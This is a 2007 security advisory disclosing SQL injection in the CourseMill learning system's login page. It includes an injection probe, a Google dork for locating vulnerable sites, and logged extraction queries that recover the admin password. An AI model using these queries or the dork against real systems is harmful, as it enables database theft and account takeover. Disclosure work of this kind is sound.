Trivantis CourseMill Enterprise Learning Management System - SQL Injection

2007.12.17
Credit: sasquatch
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+======================================================================= ===========================+ + Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 + +======================================================================= ===========================+ DISCOVERED BY: ============== sasquatch of SecureState - swhite (at) securestate (dot) com [email concealed] HOMEPAGE: ========= www.securestate.com AFFECTED AREA: ============== The username field on the login page is susceptible to SQL injection... http://www.website.com/coursemill/userlogin.jsp seems to be the default login page. Impact: Full data dump of underlying database ---> Username/Passwords ~~~> ??? username: ' password: test An unrecoverable error has occurred. Please report this message to your system administrator. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Exit ?2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved. EXPLOITATION: ============= Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database. This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx The logins are unencrypted and stored in the "Admin" table. Column names are: ID, LastLogin, OrgId, Passsword. This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible. CONFIRMED AGAINST: ================== CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html) EXAMPLE GOOGLEDORK: =================== "Trivantis and CourseMill are registered trademarks of Trivantis" VENDOR INFORMATION: =================== Trivantis Corporation 311 Elm Street Suite 200 Cincinnati, OH 45202 877-929-0188 513-929-0188 http://www.trivantis.com Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us. Sample Query Logs from Exploiter Beta: ====================================== QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') Column found: table=Admin, column=ID QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID' Column found: table=Admin, column=LastLogin QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin' Column found: table=Admin, column=OrgId QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId' Column found: table=Admin, column=Password QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password' Extracting records for table=Admin... Exploit method is now Convert QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin Value found: table=Admin, column=ID, value=admin QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin' Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin' Value found: table=Admin, column=OrgId, value= QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin' Value found: table=Admin, column=Password, value=admin Etc... and proceeds to dump the entire database...


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top